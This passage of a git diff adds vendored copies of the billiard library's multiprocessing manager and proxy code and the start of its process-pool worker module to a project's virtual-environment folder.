exception was %r', exc) + conn.close() + sys.exit(1) + + def fallback_getvalue(self, conn, ident, obj): + return obj + + def fallback_str(self, conn, ident, obj): + return str(obj) + + def fallback_repr(self, conn, ident, obj): + return repr(obj) + + fallback_mapping = { + '__str__': fallback_str, + '__repr__': fallback_repr, + '#GETVALUE': fallback_getvalue, + } + + def dummy(self, c): + pass + + def debug_info(self, c): + ''' + Return some info --- useful to spot problems with refcounting + ''' + with self.mutex: + result = [] + keys = list(self.id_to_obj.keys()) + keys.sort() + for ident in keys: + if ident != '0': + result.append(' %s: refcount=%s\n %s' % + (ident, self.id_to_refcount[ident], + str(self.id_to_obj[ident][0])[:75])) + return '\n'.join(result) + + def number_of_objects(self, c): + ''' + Number of shared objects + ''' + return len(self.id_to_obj) - 1 # don't count ident='0' + + def shutdown(self, c): + ''' + Shutdown this process + ''' + try: + util.debug('Manager received shutdown message') + c.send(('#RETURN', None)) + except: + import traceback + traceback.print_exc() + finally: + self.stop_event.set() + + def create(self, c, typeid, *args, **kwds): + ''' + Create a new shared object and return its id + ''' + with self.mutex: + callable, exposed, method_to_typeid, proxytype = \ + self.registry[typeid] + + if callable is None: + assert len(args) == 1 and not kwds + obj = args[0] + else: + obj = callable(*args, **kwds) + + if exposed is None: + exposed = public_methods(obj) + if method_to_typeid is not None: + assert type(method_to_typeid) is dict + exposed = list(exposed) + list(method_to_typeid) + # convert to string because xmlrpclib + # only has 32 bit signed integers + ident = '%x' % id(obj) + util.debug('%r callable returned object with id %r', typeid, ident) + + self.id_to_obj[ident] = (obj, set(exposed), method_to_typeid) + if ident not in self.id_to_refcount: + self.id_to_refcount[ident] = 0 + # increment the reference count immediately, to avoid + # this object being garbage collected before a Proxy + # object for it can be created. The caller of create() + # is responsible for doing a decref once the Proxy object + # has been created. 
+ self.incref(c, ident) + return ident, tuple(exposed) + + def get_methods(self, c, token): + ''' + Return the methods of the shared object indicated by token + ''' + return tuple(self.id_to_obj[token.id][1]) + + def accept_connection(self, c, name): + ''' + Spawn a new thread to serve this connection + ''' + threading.current_thread().name = name + c.send(('#RETURN', None)) + self.serve_client(c) + + def incref(self, c, ident): + with self.mutex: + self.id_to_refcount[ident] += 1 + + def decref(self, c, ident): + with self.mutex: + assert self.id_to_refcount[ident] >= 1 + self.id_to_refcount[ident] -= 1 + if self.id_to_refcount[ident] == 0: + del self.id_to_obj[ident], self.id_to_refcount[ident] + util.debug('disposing of obj with id %r', ident) + +# +# Class to represent state of a manager +# + + +class State: + __slots__ = ['value'] + INITIAL = 0 + STARTED = 1 + SHUTDOWN = 2 + +# +# Mapping from serializer name to Listener and Client types +# + +listener_client = { + 'pickle': (connection.Listener, connection.Client), + 'xmlrpclib': (connection.XmlListener, connection.XmlClient), +} + +# +# Definition of BaseManager +# + + +class BaseManager: + ''' + Base class for managers + ''' + _registry = {} + _Server = Server + + def __init__(self, address=None, authkey=None, serializer='pickle', + ctx=None): + if authkey is None: + authkey = process.current_process().authkey + self._address = address # XXX not final address if eg ('', 0) + self._authkey = process.AuthenticationString(authkey) + self._state = State() + self._state.value = State.INITIAL + self._serializer = serializer + self._Listener, self._Client = listener_client[serializer] + self._ctx = ctx or get_context() + + def __reduce__(self): + return (type(self).from_address, + (self._address, self._authkey, self._serializer)) + + def get_server(self): + ''' + Return server object with serve_forever() method and address attribute + ''' + assert self._state.value == State.INITIAL + return Server(self._registry, self._address, + self._authkey, self._serializer) + + def connect(self): + ''' + Connect manager object to the server process + ''' + Listener, Client = listener_client[self._serializer] + conn = Client(self._address, authkey=self._authkey) + dispatch(conn, None, 'dummy') + self._state.value = State.STARTED + + def start(self, initializer=None, initargs=()): + ''' + Spawn a server process for this manager object + ''' + assert self._state.value == State.INITIAL + + if initializer is not None and not callable(initializer): + raise TypeError('initializer must be a callable') + + # pipe over which we will retrieve address of server + reader, writer = connection.Pipe(duplex=False) + + # spawn process which runs a server + self._process = self._ctx.Process( + target=type(self)._run_server, + args=(self._registry, self._address, self._authkey, + self._serializer, writer, initializer, initargs), + ) + ident = ':'.join(str(i) for i in self._process._identity) + self._process.name = type(self).__name__ + '-' + ident + self._process.start() + + # get address of server + writer.close() + self._address = reader.recv() + reader.close() + + # register a finalizer + self._state.value = State.STARTED + self.shutdown = util.Finalize( + self, type(self)._finalize_manager, + args=(self._process, self._address, self._authkey, + self._state, self._Client), + exitpriority=0 + ) + + @classmethod + def _run_server(cls, registry, address, authkey, serializer, writer, + initializer=None, initargs=()): + ''' + Create a server, report its address and run it 
+ ''' + if initializer is not None: + initializer(*initargs) + + # create server + server = cls._Server(registry, address, authkey, serializer) + + # inform parent process of the server's address + writer.send(server.address) + writer.close() + + # run the manager + util.info('manager serving at %r', server.address) + server.serve_forever() + + def _create(self, typeid, *args, **kwds): + ''' + Create a new shared object; return the token and exposed tuple + ''' + assert self._state.value == State.STARTED, 'server not yet started' + conn = self._Client(self._address, authkey=self._authkey) + try: + id, exposed = dispatch(conn, None, 'create', + (typeid,) + args, kwds) + finally: + conn.close() + return Token(typeid, self._address, id), exposed + + def join(self, timeout=None): + ''' + Join the manager process (if it has been spawned) + ''' + if self._process is not None: + self._process.join(timeout) + if not self._process.is_alive(): + self._process = None + + def _debug_info(self): + ''' + Return some info about the servers shared objects and connections + ''' + conn = self._Client(self._address, authkey=self._authkey) + try: + return dispatch(conn, None, 'debug_info') + finally: + conn.close() + + def _number_of_objects(self): + ''' + Return the number of shared objects + ''' + conn = self._Client(self._address, authkey=self._authkey) + try: + return dispatch(conn, None, 'number_of_objects') + finally: + conn.close() + + def __enter__(self): + if self._state.value == State.INITIAL: + self.start() + assert self._state.value == State.STARTED + return self + + def __exit__(self, exc_type, exc_val, exc_tb): + self.shutdown() + + @staticmethod + def _finalize_manager(process, address, authkey, state, _Client): + ''' + Shutdown the manager process; will be registered as a finalizer + ''' + if process.is_alive(): + util.info('sending shutdown message to manager') + try: + conn = _Client(address, authkey=authkey) + try: + dispatch(conn, None, 'shutdown') + finally: + conn.close() + except Exception: + pass + + process.join(timeout=1.0) + if process.is_alive(): + util.info('manager still alive') + if hasattr(process, 'terminate'): + util.info('trying to `terminate()` manager process') + process.terminate() + process.join(timeout=0.1) + if process.is_alive(): + util.info('manager still alive after terminate') + + state.value = State.SHUTDOWN + try: + del BaseProxy._address_to_local[address] + except KeyError: + pass + + address = property(lambda self: self._address) + + @classmethod + def register(cls, typeid, callable=None, proxytype=None, exposed=None, + method_to_typeid=None, create_method=True): + ''' + Register a typeid with the manager type + ''' + if '_registry' not in cls.__dict__: + cls._registry = cls._registry.copy() + + if proxytype is None: + proxytype = AutoProxy + + exposed = exposed or getattr(proxytype, '_exposed_', None) + + method_to_typeid = ( + method_to_typeid or + getattr(proxytype, '_method_to_typeid_', None) + ) + + if method_to_typeid: + for key, value in method_to_typeid.items(): + assert type(key) is str, '%r is not a string' % key + assert type(value) is str, '%r is not a string' % value + + cls._registry[typeid] = ( + callable, exposed, method_to_typeid, proxytype + ) + + if create_method: + def temp(self, *args, **kwds): + util.debug('requesting creation of a shared %r object', typeid) + token, exp = self._create(typeid, *args, **kwds) + proxy = proxytype( + token, self._serializer, manager=self, + authkey=self._authkey, exposed=exp + ) + conn = 
self._Client(token.address, authkey=self._authkey) + dispatch(conn, None, 'decref', (token.id,)) + return proxy + temp.__name__ = typeid + setattr(cls, typeid, temp) + +# +# Subclass of set which get cleared after a fork +# + + +class ProcessLocalSet(set): + + def __init__(self): + util.register_after_fork(self, lambda obj: obj.clear()) + + def __reduce__(self): + return type(self), () + +# +# Definition of BaseProxy +# + + +class BaseProxy: + ''' + A base for proxies of shared objects + ''' + _address_to_local = {} + _mutex = util.ForkAwareThreadLock() + + def __init__(self, token, serializer, manager=None, + authkey=None, exposed=None, incref=True): + with BaseProxy._mutex: + tls_idset = BaseProxy._address_to_local.get(token.address, None) + if tls_idset is None: + tls_idset = util.ForkAwareLocal(), ProcessLocalSet() + BaseProxy._address_to_local[token.address] = tls_idset + + # self._tls is used to record the connection used by this + # thread to communicate with the manager at token.address + self._tls = tls_idset[0] + + # self._idset is used to record the identities of all shared + # objects for which the current process owns references and + # which are in the manager at token.address + self._idset = tls_idset[1] + + self._token = token + self._id = self._token.id + self._manager = manager + self._serializer = serializer + self._Client = listener_client[serializer][1] + + if authkey is not None: + self._authkey = process.AuthenticationString(authkey) + elif self._manager is not None: + self._authkey = self._manager._authkey + else: + self._authkey = process.current_process().authkey + + if incref: + self._incref() + + util.register_after_fork(self, BaseProxy._after_fork) + + def _connect(self): + util.debug('making connection to manager') + name = process.current_process().name + if threading.current_thread().name != 'MainThread': + name += '|' + threading.current_thread().name + conn = self._Client(self._token.address, authkey=self._authkey) + dispatch(conn, None, 'accept_connection', (name,)) + self._tls.connection = conn + + def _callmethod(self, methodname, args=(), kwds={}): + ''' + Try to call a method of the referrent and return a copy of the result + ''' + try: + conn = self._tls.connection + except AttributeError: + util.debug('thread %r does not own a connection', + threading.current_thread().name) + self._connect() + conn = self._tls.connection + + conn.send((self._id, methodname, args, kwds)) + kind, result = conn.recv() + + if kind == '#RETURN': + return result + elif kind == '#PROXY': + exposed, token = result + proxytype = self._manager._registry[token.typeid][-1] + token.address = self._token.address + proxy = proxytype( + token, self._serializer, manager=self._manager, + authkey=self._authkey, exposed=exposed + ) + conn = self._Client(token.address, authkey=self._authkey) + dispatch(conn, None, 'decref', (token.id,)) + return proxy + raise convert_to_error(kind, result) + + def _getvalue(self): + ''' + Get a copy of the value of the referent + ''' + return self._callmethod('#GETVALUE') + + def _incref(self): + conn = self._Client(self._token.address, authkey=self._authkey) + dispatch(conn, None, 'incref', (self._id,)) + util.debug('INCREF %r', self._token.id) + + self._idset.add(self._id) + + state = self._manager and self._manager._state + + self._close = util.Finalize( + self, BaseProxy._decref, + args=(self._token, self._authkey, state, + self._tls, self._idset, self._Client), + exitpriority=10 + ) + + @staticmethod + def _decref(token, authkey, state, tls, idset, 
_Client): + idset.discard(token.id) + + # check whether manager is still alive + if state is None or state.value == State.STARTED: + # tell manager this process no longer cares about referent + try: + util.debug('DECREF %r', token.id) + conn = _Client(token.address, authkey=authkey) + dispatch(conn, None, 'decref', (token.id,)) + except Exception as exc: + util.debug('... decref failed %s', exc) + + else: + util.debug('DECREF %r -- manager already shutdown', token.id) + + # check whether we can close this thread's connection because + # the process owns no more references to objects for this manager + if not idset and hasattr(tls, 'connection'): + util.debug('thread %r has no more proxies so closing conn', + threading.current_thread().name) + tls.connection.close() + del tls.connection + + def _after_fork(self): + self._manager = None + try: + self._incref() + except Exception as exc: + # the proxy may just be for a manager which has shutdown + util.info('incref failed: %s', exc) + + def __reduce__(self): + kwds = {} + if context.get_spawning_popen() is not None: + kwds['authkey'] = self._authkey + + if getattr(self, '_isauto', False): + kwds['exposed'] = self._exposed_ + return (RebuildProxy, + (AutoProxy, self._token, self._serializer, kwds)) + else: + return (RebuildProxy, + (type(self), self._token, self._serializer, kwds)) + + def __deepcopy__(self, memo): + return self._getvalue() + + def __repr__(self): + return '<%s object, typeid %r at %#x>' % \ + (type(self).__name__, self._token.typeid, id(self)) + + def __str__(self): + ''' + Return representation of the referent (or a fall-back if that fails) + ''' + try: + return self._callmethod('__repr__') + except Exception: + return repr(self)[:-1] + "; '__str__()' failed>" + +# +# Function used for unpickling +# + + +def RebuildProxy(func, token, serializer, kwds): + ''' + Function used for unpickling proxy objects. + + If possible the shared object is returned, or otherwise a proxy for it. 
+ ''' + server = getattr(process.current_process(), '_manager_server', None) + + if server and server.address == token.address: + return server.id_to_obj[token.id][0] + else: + incref = ( + kwds.pop('incref', True) and + not getattr(process.current_process(), '_inheriting', False) + ) + return func(token, serializer, incref=incref, **kwds) + +# +# Functions to create proxies and proxy types +# + + +def MakeProxyType(name, exposed, _cache={}): + ''' + Return an proxy type whose methods are given by `exposed` + ''' + exposed = tuple(exposed) + try: + return _cache[(name, exposed)] + except KeyError: + pass + + dic = {} + + for meth in exposed: + exec('''def %s(self, *args, **kwds): + return self._callmethod(%r, args, kwds)''' % (meth, meth), dic) + + ProxyType = type(name, (BaseProxy,), dic) + ProxyType._exposed_ = exposed + _cache[(name, exposed)] = ProxyType + return ProxyType + + +def AutoProxy(token, serializer, manager=None, authkey=None, + exposed=None, incref=True): + ''' + Return an auto-proxy for `token` + ''' + _Client = listener_client[serializer][1] + + if exposed is None: + conn = _Client(token.address, authkey=authkey) + try: + exposed = dispatch(conn, None, 'get_methods', (token,)) + finally: + conn.close() + + if authkey is None and manager is not None: + authkey = manager._authkey + if authkey is None: + authkey = process.current_process().authkey + + ProxyType = MakeProxyType('AutoProxy[%s]' % token.typeid, exposed) + proxy = ProxyType(token, serializer, manager=manager, authkey=authkey, + incref=incref) + proxy._isauto = True + return proxy + +# +# Types/callables which we will register with SyncManager +# + + +class Namespace: + + def __init__(self, **kwds): + self.__dict__.update(kwds) + + def __repr__(self): + _items = list(self.__dict__.items()) + temp = [] + for name, value in _items: + if not name.startswith('_'): + temp.append('%s=%r' % (name, value)) + temp.sort() + return '%s(%s)' % (self.__class__.__name__, ', '.join(temp)) + + +class Value: + + def __init__(self, typecode, value, lock=True): + self._typecode = typecode + self._value = value + + def get(self): + return self._value + + def set(self, value): + self._value = value + + def __repr__(self): + return '%s(%r, %r)' % (type(self).__name__, + self._typecode, self._value) + value = property(get, set) + + +def Array(typecode, sequence, lock=True): + return array.array(typecode, sequence) + +# +# Proxy types used by SyncManager +# + + +class IteratorProxy(BaseProxy): + if sys.version_info[0] == 3: + _exposed = ('__next__', 'send', 'throw', 'close') + else: + _exposed_ = ('__next__', 'next', 'send', 'throw', 'close') + + def next(self, *args): + return self._callmethod('next', args) + + def __iter__(self): + return self + + def __next__(self, *args): + return self._callmethod('__next__', args) + + def send(self, *args): + return self._callmethod('send', args) + + def throw(self, *args): + return self._callmethod('throw', args) + + def close(self, *args): + return self._callmethod('close', args) + + +class AcquirerProxy(BaseProxy): + _exposed_ = ('acquire', 'release') + + def acquire(self, blocking=True, timeout=None): + args = (blocking, ) if timeout is None else (blocking, timeout) + return self._callmethod('acquire', args) + + def release(self): + return self._callmethod('release') + + def __enter__(self): + return self._callmethod('acquire') + + def __exit__(self, exc_type, exc_val, exc_tb): + return self._callmethod('release') + + +class ConditionProxy(AcquirerProxy): + _exposed_ = ('acquire', 'release', 
'wait', 'notify', 'notify_all') + + def wait(self, timeout=None): + return self._callmethod('wait', (timeout,)) + + def notify(self): + return self._callmethod('notify') + + def notify_all(self): + return self._callmethod('notify_all') + + def wait_for(self, predicate, timeout=None): + result = predicate() + if result: + return result + if timeout is not None: + endtime = monotonic() + timeout + else: + endtime = None + waittime = None + while not result: + if endtime is not None: + waittime = endtime - monotonic() + if waittime <= 0: + break + self.wait(waittime) + result = predicate() + return result + + +class EventProxy(BaseProxy): + _exposed_ = ('is_set', 'set', 'clear', 'wait') + + def is_set(self): + return self._callmethod('is_set') + + def set(self): + return self._callmethod('set') + + def clear(self): + return self._callmethod('clear') + + def wait(self, timeout=None): + return self._callmethod('wait', (timeout,)) + + +class BarrierProxy(BaseProxy): + _exposed_ = ('__getattribute__', 'wait', 'abort', 'reset') + + def wait(self, timeout=None): + return self._callmethod('wait', (timeout, )) + + def abort(self): + return self._callmethod('abort') + + def reset(self): + return self._callmethod('reset') + + @property + def parties(self): + return self._callmethod('__getattribute__', ('parties', )) + + @property + def n_waiting(self): + return self._callmethod('__getattribute__', ('n_waiting', )) + + @property + def broken(self): + return self._callmethod('__getattribute__', ('broken', )) + + +class NamespaceProxy(BaseProxy): + _exposed_ = ('__getattribute__', '__setattr__', '__delattr__') + + def __getattr__(self, key): + if key[0] == '_': + return object.__getattribute__(self, key) + callmethod = object.__getattribute__(self, '_callmethod') + return callmethod('__getattribute__', (key,)) + + def __setattr__(self, key, value): + if key[0] == '_': + return object.__setattr__(self, key, value) + callmethod = object.__getattribute__(self, '_callmethod') + return callmethod('__setattr__', (key, value)) + + def __delattr__(self, key): + if key[0] == '_': + return object.__delattr__(self, key) + callmethod = object.__getattribute__(self, '_callmethod') + return callmethod('__delattr__', (key,)) + + +class ValueProxy(BaseProxy): + _exposed_ = ('get', 'set') + + def get(self): + return self._callmethod('get') + + def set(self, value): + return self._callmethod('set', (value,)) + value = property(get, set) + + +_ListProxy_Attributes = ( + '__add__', '__contains__', '__delitem__', '__getitem__', '__len__', + '__mul__', '__reversed__', '__rmul__', '__setitem__', + 'append', 'count', 'extend', 'index', 'insert', 'pop', 'remove', + 'reverse', 'sort', '__imul__', +) +if not PY3: + _ListProxy_Attributes += ('__getslice__', '__setslice__', '__delslice__') +BaseListProxy = MakeProxyType('BaseListProxy', _ListProxy_Attributes) + + +class ListProxy(BaseListProxy): + + def __iadd__(self, value): + self._callmethod('extend', (value,)) + return self + + def __imul__(self, value): + self._callmethod('__imul__', (value,)) + return self + + +DictProxy = MakeProxyType('DictProxy', ( + '__contains__', '__delitem__', '__getitem__', '__len__', + '__setitem__', 'clear', 'copy', 'get', 'has_key', 'items', + 'keys', 'pop', 'popitem', 'setdefault', 'update', 'values', +)) + + +_ArrayProxy_Attributes = ( + '__len__', '__getitem__', '__setitem__', +) +if not PY3: + _ArrayProxy_Attributes += ('__getslice__', '__setslice__') +ArrayProxy = MakeProxyType('ArrayProxy', _ArrayProxy_Attributes) + + +BasePoolProxy = 
MakeProxyType('PoolProxy', ( + 'apply', 'apply_async', 'close', 'imap', 'imap_unordered', 'join', + 'map', 'map_async', 'starmap', 'starmap_async', 'terminate', +)) +BasePoolProxy._method_to_typeid_ = { + 'apply_async': 'AsyncResult', + 'map_async': 'AsyncResult', + 'starmap_async': 'AsyncResult', + 'imap': 'Iterator', + 'imap_unordered': 'Iterator', +} + + +class PoolProxy(BasePoolProxy): + def __enter__(self): + return self + + def __exit__(self, *exc_info): + self.terminate() + + +# +# Definition of SyncManager +# + + +class SyncManager(BaseManager): + ''' + Subclass of `BaseManager` which supports a number of shared object types. + + The types registered are those intended for the synchronization + of threads, plus `dict`, `list` and `Namespace`. + + The `billiard.Manager()` function creates started instances of + this class. + ''' + +SyncManager.register('Queue', Queue) +SyncManager.register('JoinableQueue', Queue) +SyncManager.register('Event', threading.Event, EventProxy) +SyncManager.register('Lock', threading.Lock, AcquirerProxy) +SyncManager.register('RLock', threading.RLock, AcquirerProxy) +SyncManager.register('Semaphore', threading.Semaphore, AcquirerProxy) +SyncManager.register('BoundedSemaphore', threading.BoundedSemaphore, + AcquirerProxy) +SyncManager.register('Condition', threading.Condition, ConditionProxy) +if hasattr(threading, 'Barrier'): # PY3 + SyncManager.register('Barrier', threading.Barrier, BarrierProxy) +SyncManager.register('Pool', pool.Pool, PoolProxy) +SyncManager.register('list', list, ListProxy) +SyncManager.register('dict', dict, DictProxy) +SyncManager.register('Value', Value, ValueProxy) +SyncManager.register('Array', Array, ArrayProxy) +SyncManager.register('Namespace', Namespace, NamespaceProxy) + +# types returned by methods of PoolProxy +SyncManager.register('Iterator', proxytype=IteratorProxy, create_method=False) +SyncManager.register('AsyncResult', create_method=False) diff --git a/env/Lib/site-packages/billiard/pool.py b/env/Lib/site-packages/billiard/pool.py new file mode 100644 index 00000000..f8d477bf --- /dev/null +++ b/env/Lib/site-packages/billiard/pool.py @@ -0,0 +1,2052 @@ +# +# Module providing the `Pool` class for managing a process pool +# +# multiprocessing/pool.py +# +# Copyright (c) 2006-2008, R Oudkerk +# Licensed to PSF under a Contributor Agreement. +# + +# +# Imports +# +import copy +import errno +import itertools +import os +import platform +import signal +import sys +import threading +import time +import warnings + +from collections import deque +from functools import partial + +from . import cpu_count, get_context +from . import util +from .common import ( + TERM_SIGNAL, human_status, pickle_loads, reset_signals, restart_state, +) +from .compat import get_errno, mem_rss, send_offset +from .einfo import ExceptionInfo +from .dummy import DummyProcess +from .exceptions import ( + CoroStop, + RestartFreqExceeded, + SoftTimeLimitExceeded, + Terminated, + TimeLimitExceeded, + TimeoutError, + WorkerLostError, +) +from time import monotonic +from queue import Queue, Empty +from .util import Finalize, debug, warning + +MAXMEM_USED_FMT = """\ +child process exiting after exceeding memory limit ({0}KiB / {1}KiB) +""" + +PY3 = sys.version_info[0] == 3 + +if platform.system() == 'Windows': # pragma: no cover + # On Windows os.kill calls TerminateProcess which cannot be + # handled by # any process, so this is needed to terminate the task + # *and its children* (if any). 
+ from ._win import kill_processtree as _kill # noqa + SIGKILL = TERM_SIGNAL +else: + from os import kill as _kill # noqa + SIGKILL = signal.SIGKILL + + +try: + TIMEOUT_MAX = threading.TIMEOUT_MAX +except AttributeError: # pragma: no cover + TIMEOUT_MAX = 1e10 # noqa + + +if sys.version_info >= (3, 3): + _Semaphore = threading.Semaphore +else: + # Semaphore is a factory function pointing to _Semaphore + _Semaphore = threading._Semaphore # noqa + +# +# Constants representing the state of a pool +# + +RUN = 0 +CLOSE = 1 +TERMINATE = 2 + +# +# Constants representing the state of a job +# + +ACK = 0 +READY = 1 +TASK = 2 +NACK = 3 +DEATH = 4 + +# +# Exit code constants +# +EX_OK = 0 +EX_FAILURE = 1 +EX_RECYCLE = 0x9B + + +# Signal used for soft time limits. +SIG_SOFT_TIMEOUT = getattr(signal, "SIGUSR1", None) + +# +# Miscellaneous +# + +LOST_WORKER_TIMEOUT = 10.0 +EX_OK = getattr(os, "EX_OK", 0) +GUARANTEE_MESSAGE_CONSUMPTION_RETRY_LIMIT = 300 +GUARANTEE_MESSAGE_CONSUMPTION_RETRY_INTERVAL = 0.1 + +job_counter = itertools.count() + +Lock = threading.Lock + + +def _get_send_offset(connection): + try: + native = connection.send_offset + except AttributeError: + native = None + if native is None: + return partial(send_offset, connection.fileno()) + return native + + +def mapstar(args): + return list(map(*args)) + + +def starmapstar(args): + return list(itertools.starmap(args[0], args[1])) + + +def error(msg, *args, **kwargs): + util.get_logger().error(msg, *args, **kwargs) + + +def stop_if_not_current(thread, timeout=None): + if thread is not threading.current_thread(): + thread.stop(timeout) + + +class LaxBoundedSemaphore(_Semaphore): + """Semaphore that checks that # release is <= # acquires, + but ignores if # releases >= value.""" + + def shrink(self): + self._initial_value -= 1 + self.acquire() + + if PY3: + + def __init__(self, value=1, verbose=None): + _Semaphore.__init__(self, value) + self._initial_value = value + + def grow(self): + with self._cond: + self._initial_value += 1 + self._value += 1 + self._cond.notify() + + def release(self): + cond = self._cond + with cond: + if self._value < self._initial_value: + self._value += 1 + cond.notify_all() + + def clear(self): + while self._value < self._initial_value: + _Semaphore.release(self) + else: + + def __init__(self, value=1, verbose=None): + _Semaphore.__init__(self, value, verbose) + self._initial_value = value + + def grow(self): + cond = self._Semaphore__cond + with cond: + self._initial_value += 1 + self._Semaphore__value += 1 + cond.notify() + + def release(self): # noqa + cond = self._Semaphore__cond + with cond: + if self._Semaphore__value < self._initial_value: + self._Semaphore__value += 1 + cond.notifyAll() + + def clear(self): # noqa + while self._Semaphore__value < self._initial_value: + _Semaphore.release(self) + +# +# Exceptions +# + + +class MaybeEncodingError(Exception): + """Wraps possible unpickleable errors, so they can be + safely sent through the socket.""" + + def __init__(self, exc, value): + self.exc = repr(exc) + self.value = repr(value) + super().__init__(self.exc, self.value) + + def __repr__(self): + return "<%s: %s>" % (self.__class__.__name__, str(self)) + + def __str__(self): + return "Error sending result: '%r'. Reason: '%r'." 
% ( + self.value, self.exc) + + +class WorkersJoined(Exception): + """All workers have terminated.""" + + +def soft_timeout_sighandler(signum, frame): + raise SoftTimeLimitExceeded() + +# +# Code run by worker processes +# + + +class Worker: + + def __init__(self, inq, outq, synq=None, initializer=None, initargs=(), + maxtasks=None, sentinel=None, on_exit=None, + sigprotection=True, wrap_exception=True, + max_memory_per_child=None, on_ready_counter=None): + assert maxtasks is None or (type(maxtasks) == int and maxtasks > 0) + self.initializer = initializer + self.initargs = initargs + self.maxtasks = maxtasks + self.max_memory_per_child = max_memory_per_child + self._shutdown = sentinel + self.on_exit = on_exit + self.sigprotection = sigprotection + self.inq, self.outq, self.synq = inq, outq, synq + self.wrap_exception = wrap_exception # XXX cannot disable yet + self.on_ready_counter = on_ready_counter + self.contribute_to_object(self) + + def contribute_to_object(self, obj): + obj.inq, obj.outq, obj.synq = self.inq, self.outq, self.synq + obj.inqW_fd = self.inq._writer.fileno() # inqueue write fd + obj.outqR_fd = self.outq._reader.fileno() # outqueue read fd + if self.synq: + obj.synqR_fd = self.synq._reader.fileno() # synqueue read fd + obj.synqW_fd = self.synq._writer.fileno() # synqueue write fd + obj.send_syn_offset = _get_send_offset(self.synq._writer) + else: + obj.synqR_fd = obj.synqW_fd = obj._send_syn_offset = None + obj._quick_put = self.inq._writer.send + obj._quick_get = self.outq._reader.recv + obj.send_job_offset = _get_send_offset(self.inq._writer) + return obj + + def __reduce__(self): + return self.__class__, ( + self.inq, self.outq, self.synq, self.initializer, + self.initargs, self.maxtasks, self._shutdown, self.on_exit, + self.sigprotection, self.wrap_exception, self.max_memory_per_child, + ) + + def __call__(self): + _exit = sys.exit + _exitcode = [None] + + def exit(status=None): + _exitcode[0] = status + return _exit(status) + sys.exit = exit + + pid = os.getpid() + + self._make_child_methods() + self.after_fork() + self.on_loop_start(pid=pid) # callback on loop start + try: + sys.exit(self.workloop(pid=pid)) + except Exception as exc: + error('Pool process %r error: %r', self, exc, exc_info=1) + self._do_exit(pid, _exitcode[0], exc) + finally: + self._do_exit(pid, _exitcode[0], None) + + def _do_exit(self, pid, exitcode, exc=None): + if exitcode is None: + exitcode = EX_FAILURE if exc else EX_OK + + if self.on_exit is not None: + self.on_exit(pid, exitcode) + + if sys.platform != 'win32': + try: + self.outq.put((DEATH, (pid, exitcode))) + time.sleep(1) + finally: + os._exit(exitcode) + else: + os._exit(exitcode) + + def on_loop_start(self, pid): + pass + + def prepare_result(self, result): + return result + + def workloop(self, debug=debug, now=monotonic, pid=None): + pid = pid or os.getpid() + put = self.outq.put + inqW_fd = self.inqW_fd + synqW_fd = self.synqW_fd + maxtasks = self.maxtasks + max_memory_per_child = self.max_memory_per_child or 0 + prepare_result = self.prepare_result + + wait_for_job = self.wait_for_job + _wait_for_syn = self.wait_for_syn + + def wait_for_syn(jid): + i = 0 + while 1: + if i > 60: + error('!!!WAIT FOR ACK TIMEOUT: job:%r fd:%r!!!', + jid, self.synq._reader.fileno(), exc_info=1) + req = _wait_for_syn() + if req: + type_, args = req + if type_ == NACK: + return False + assert type_ == ACK + return True + i += 1 + + completed = 0 + try: + while maxtasks is None or (maxtasks and completed < maxtasks): + req = wait_for_job() + if req: + 
type_, args_ = req + assert type_ == TASK + job, i, fun, args, kwargs = args_ + put((ACK, (job, i, now(), pid, synqW_fd))) + if _wait_for_syn: + confirm = wait_for_syn(job) + if not confirm: + continue # received NACK + try: + result = (True, prepare_result(fun(*args, **kwargs))) + except Exception: + result = (False, ExceptionInfo()) + try: + put((READY, (job, i, result, inqW_fd))) + except Exception as exc: + _, _, tb = sys.exc_info() + try: + wrapped = MaybeEncodingError(exc, result[1]) + einfo = ExceptionInfo(( + MaybeEncodingError, wrapped, tb, + )) + put((READY, (job, i, (False, einfo), inqW_fd))) + finally: + del(tb) + completed += 1 + if max_memory_per_child > 0: + used_kb = mem_rss() + if used_kb <= 0: + error('worker unable to determine memory usage') + if used_kb > 0 and used_kb > max_memory_per_child: + warning(MAXMEM_USED_FMT.format( + used_kb, max_memory_per_child)) + return EX_RECYCLE + + debug('worker exiting after %d tasks', completed) + if maxtasks: + return EX_RECYCLE if completed == maxtasks else EX_FAILURE + return EX_OK + finally: + # Before exiting the worker, we want to ensure that that all + # messages produced by the worker have been consumed by the main + # process. This prevents the worker being terminated prematurely + # and messages being lost. + self._ensure_messages_consumed(completed=completed) + + def _ensure_messages_consumed(self, completed): + """ Returns true if all messages sent out have been received and + consumed within a reasonable amount of time """ + + if not self.on_ready_counter: + return False + + for retry in range(GUARANTEE_MESSAGE_CONSUMPTION_RETRY_LIMIT): + if self.on_ready_counter.value >= completed: + debug('ensured messages consumed after %d retries', retry) + return True + time.sleep(GUARANTEE_MESSAGE_CONSUMPTION_RETRY_INTERVAL) + warning('could not ensure all messages were consumed prior to ' + 'exiting') + return False + + def after_fork(self): + if hasattr(self.inq, '_writer'): + self.inq._writer.close() + if hasattr(self.outq, '_reader'): + self.outq._reader.close() + + if self.initializer is not None: + self.initializer(*self.initargs) + + # Make sure all exiting signals call finally: blocks. + # This is important for the semaphore to be released. + reset_signals(full=self.sigprotection) + + # install signal handler for soft timeouts. 
+ if SIG_SOFT_TIMEOUT is not None: + signal.signal(SIG_SOFT_TIMEOUT, soft_timeout_sighandler) + + try: + signal.signal(signal.SIGINT, signal.SIG_IGN) + except AttributeError: + pass + + def _make_recv_method(self, conn): + get = conn.get + + if hasattr(conn, '_reader'): + _poll = conn._reader.poll + if hasattr(conn, 'get_payload') and conn.get_payload: + get_payload = conn.get_payload + + def _recv(timeout, loads=pickle_loads): + return True, loads(get_payload()) + else: + def _recv(timeout): # noqa + if _poll(timeout): + return True, get() + return False, None + else: + def _recv(timeout): # noqa + try: + return True, get(timeout=timeout) + except Queue.Empty: + return False, None + return _recv + + def _make_child_methods(self, loads=pickle_loads): + self.wait_for_job = self._make_protected_receive(self.inq) + self.wait_for_syn = (self._make_protected_receive(self.synq) + if self.synq else None) + + def _make_protected_receive(self, conn): + _receive = self._make_recv_method(conn) + should_shutdown = self._shutdown.is_set if self._shutdown else None + + def receive(debug=debug): + if should_shutdown and should_shutdown(): + debug('worker got sentinel -- exiting') + raise SystemExit(EX_OK) + try: + ready, req = _receive(1.0) + if not ready: + return None + except (EOFError, IOError) as exc: + if get_errno(exc) == errno.EINTR: + return None # interrupted, maybe by gdb + debug('worker got %s -- exiting', type(exc).__name__) + raise SystemExit(EX_FAILURE) + if req is None: + debug('worker got sentinel -- exiting') + raise SystemExit(EX_FAILURE) + return req + + return 